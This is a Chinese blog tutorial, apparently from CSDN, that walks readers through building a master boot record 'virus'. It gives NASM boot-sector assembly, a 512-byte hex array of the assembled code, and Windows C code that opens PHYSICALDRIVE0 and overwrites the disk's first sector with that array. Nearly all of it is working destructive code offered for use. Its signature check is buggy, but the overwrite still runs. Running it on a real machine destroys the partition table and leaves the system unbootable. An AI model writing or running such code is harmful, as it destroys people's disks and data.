手把手带你做一个主引导记录病毒

最新推荐文章于 2022-04-03 16:51:49 发布
最新推荐文章于 2022-04-03 16:51:49 发布
阅读量348 收藏 3
点赞数
分类专栏: C
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007581/article/details/99568807
版权
所需程序:nasm(将汇编文件编译为bin文件),CFF_Explorer(提取16进制码),C语言编译器(编译写的主引导记录程序)
汇编源码(网上找的):
org 07c00h ; 告诉编译器程序加载到 7c00处   
    mov ax, cs   
    mov ds, ax   
    mov es, ax                       
    call DispStr ; 调用显示字符串例程   
    jmp $ ; 无限循环   

DispStr:   
    mov ax, BootMessage   
    mov bp, ax ; es:bp = 串地址   
    mov cx, 16 ; cx = 串长度   
    mov ax, 01301h ; ah = 13, al = 01h   
    mov bx, 000ch ; 页号为 0(bh = 0) 黑底红字(bl = 0Ch,高亮)   
    mov dl, 0   
    int 10h ; 10h 号中断   
    ret   

BootMessage:   
    db "tanjingshuai"   
    times 510-($-$$) db 0 ; 填充剩下的空间,使生成的二进制代码恰好为   
    dw 0xaa55 ; 结束标志

请将倒数第三行的tanjingshuai改为你要显示的内容。
用命令nasm (源文件名).asm -o (要保存的文件名).bin。
这时候你已经有了一个.bin文件了。
用CFF_Explorer打开输出的bin文件点下H开头的分支,这就是我们要的东西。
如图:
显示的16进制码
这时候将这些16进制码转换成下面格式:

char temp[512] =
{
0x8C,0xC8,0x8E,0xD8,0x8E,0xC0,0xE8,0x02,0x00,0xEB,0xFE,0xB8,0x1E,0x7C,0x89,0xC5,0xB9,0x10,0x00,0xB8,
0x01,0x13,0xBB,0x0C,0x00,0xB2,0x00,0xCD,0x10,0xC3,0x74,0x61,0x6E,0x6A,0x69,0x6E,0x67,0x73,0x68,0x75,
0x61,0x69,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,0x55,0xAA
};

接下来用程序写入MBR。
源代码:

#include <windows.h>

char temp[512] =
{
0x8C,0xC8,0x8E,0xD8,0x8E,0xC0,0xE8,0x02,0x00,0xEB,0xFE,0xB8,0x1E,0x7C,0x89,0xC5,0xB9,0x10,0x00,0xB8,
0x01,0x13,0xBB,0x0C,0x00,0xB2,0x00,0xCD,0x10,0xC3,0x74,0x61,0x6E,0x6A,0x69,0x6E,0x67,0x73,0x68,0x75,
0x61,0x69,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,0x55,0xAA
};
int main()
{
	WriteMBR(temp);
	return 0;
}
int WriteMBR(char MBRcode[512])
{
	if (MBRcode[510] == '0x55' || MBRcode[511] == '0xAA')
	{
		return -1;
	}
	HANDLE hFile;
	DWORD dwReadSize, dwBytesReturned;
	hFile = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
	if (hFile == INVALID_HANDLE_VALUE)
	{
		return 0;
	}
	DeviceIoControl(hFile, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
	WriteFile(hFile, MBRcode, 512, &dwReadSize, NULL);
	DeviceIoControl(hFile, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
	CloseHandle(hFile);
	return 1;
}

用虚拟机运行,运行结果:
写入MBR后的界面

谭敬帅
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
引导区MBR病毒解决方案
weixin_33898876的博客
04-05 1529
mbr是硬盘的引导记录,属于引导区,故可以清除,引导区它记录着一些硬盘最基本的信息,像硬盘的分区信息,这些信息可以保证你的硬盘能正常工作,但如果这些信息被修改了,那硬盘里的数据就会丢失。一般常在网上下载东东或是经常到处乱拷东东的机器最容易患引导病毒。像CIH病毒就是利用了这一点,破坏了你的硬盘分区,使你的数据丢失。所以引导区的安全问题是相当重要的。 MBR病毒简介: ...
批处理编写(windows脚本文件)和一些简单的病毒
Little_Busters的博客
05-31 1203
本文要介绍了批处理编写(windows脚本文件)的知识,并介绍了通过windows脚本的一些简单的病毒,如:蓝屏命令、恶意清空桌面等。
Linux 系统下使用dd命令备份还原MBR引导记录
feiyu5323的专栏
03-30 2322
Linux 系统下使用dd命令备份还原MBR引导记录 https://en.wikipedia.org/wiki/Master_boot_recordhttps://www.cyberciti.biz/faq/howto-copy-mbr/https://www.cyberciti.biz/faq/linux-clearing-out-master-boot-r...
Linux 引导过程内幕
Bekars涡轮增压的Blog ^_^
08-03 1797
早期时,启动一台计算机意味着要给计算机喂一条包含引导程序的纸,或者手工使用前端面板地址/数据/控制开关来加载引导程序。尽管目前的计算机已经装备了很多工具来简化引导过程,但是这一切并没有对整个过程进行必要的简化。让我们先从高级的视角来查看 Linux 引导过程,这样就可以看到整个过程的全貌了。然后将回顾一下在各个步骤到底发生了什么。在整个过程中,参考一下内核源代码可以帮助我们更好地了解内核源代
Day7 — 写一个最小的“操作系统“
AnitaSun的博客
07-16 161
俺发现俺操作系统的时候越来越迷糊,所以从来一遍吧???? 这次参考的书籍是OrangeS一个操作系统的实现 nasm 的使用: NASM是一个80x86的汇编器 把汇编代码使用NASM编译 nasm boot.asm -o boot.bin boot.asm文件 org 07c00h ; 告诉编译器程序加载到7c00处 mov ax, cs mov ds, ax mov es, ax call DispStr ; 调用显示字符串例程 jmp $ ; 无限循环 DispStr:
C/C++用户模式下改写硬盘引导记录(MBR)
_KaQqi的博客
12-12 6641
CPU一共有四种权限级别:ring0 ring1 ring2 ring3 Windows只是用了ring0和ring3 我们在使用电脑时,一般在ring3模式下工作。在ring3模式下,我们无法使用CPU特权指令in和out。对系统所属的数据,地址空间以及硬件也是有严格的限制的。
第二课 一个简单的“引导程序
diaozhiwa5526的博客
06-15 335
  上一节中说到BIOS会将MBR中的引导程序(512字节)加载到内存的0x7c00处,其中这512字节的引导程序是软件程序,是操作系统的一部分,因此也是由操作系统开发者来编写的,BIOS将其加载到内存后,会自动跳到0x7c00处去执行。接下来我们自己实现一个引导程序”,功能很简单,就是让它打印一串字符串到屏幕上(真正的引导程序加载操作系统内核用的),注意,这段程序现在是独立...
计算机引导病毒类型,引导区MBR病毒解决方案
weixin_39614874的博客
07-31 1334
您可以使用趋势科技的RootkitBuster v5.0检查自己的MBR是否被修改下载地址:请参照下列步骤使用该工具:1)运行RootkitBuster.exe文件注意:运行后工具后会自动在您需要扫描的计算机中安装一个新的TMCOMM.SYS组件.并会提示您重启计算机来完成安装.重启完成后,再次执行工具。2)在左上方,选择您希望扫描的隐藏项类型,我们建议选择所有类型。3)单击“scan now”按...
引导病毒概述
Yo_ol的博客
04-03 2732
引导病毒,也叫开机型病毒要感染计算机引导扇区和引导扇区的一类计算机病毒;其中,感染引导扇区的病毒称作MBR病毒,感染引导区的病毒称为BR病毒
222-手把手你写一个MiniSpring
05-06
222-手把手你写一个MiniSpring
手把手教你创造第一个自己的GPTs应用.pdf
11-13
手把手教你创造第一个自己的GPTs应用.pdf
手把手教你写一个微信小程序
01-27
现在微信小程序越来越火,用户不需下载安装app即可体验产品,产品推广和运营也比较方便,这些优点使得越来越多的企业选择开发微信小程序,所以会写小程序也成为前端...先创建一个空文件夹然后打开开发者工具,新建项目
手把手教你用excel一套电脑派位摇号系统.pdf
11-19
手把手教你用excel一套电脑派位摇号系统.pdf
万字干货:手把手教你需求管理
01-27
通过这篇文章,总结自己在工作实践中需求管理的方法论——普拉姆方法。...上面讲的是个人的角度,如果一个组织或者团队面对大量的需求,在处理需求的时候,没有节奏和规划,会产生消极的影响。从小
linux大纲资料.txt
最新发布
04-23
linux
银行秒杀系统 第十三服创比赛项目.zip
04-23
银行秒杀系统 第十三服创比赛项目
单页登录源码 login登录页源码 html源码.zip
04-23
单页登录源码 login登录页源码 html源码
理性力学 陈至达.pdf
04-23
理性力学 陈至达.pdf
JAVA在线考试管理系统(源代码+论文+开题报告+外文翻译+英文文献+答辩PPT).zip
04-23
JAVA在线考试管理系统(源代码+论文+开题报告+外文翻译+英文文献+答辩PPT)
可不可以手把手一个辅导班管理系统
04-27
当然可以,我可以为您提供一些指导和建议,但请注意,这是一个相对复杂的项目,需要您具备一定的编程经验和技能。以下是一些基本的步骤和考虑因素: 1. 确认需求:您需要确定这个辅导班管理系统的具体功能和要求。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值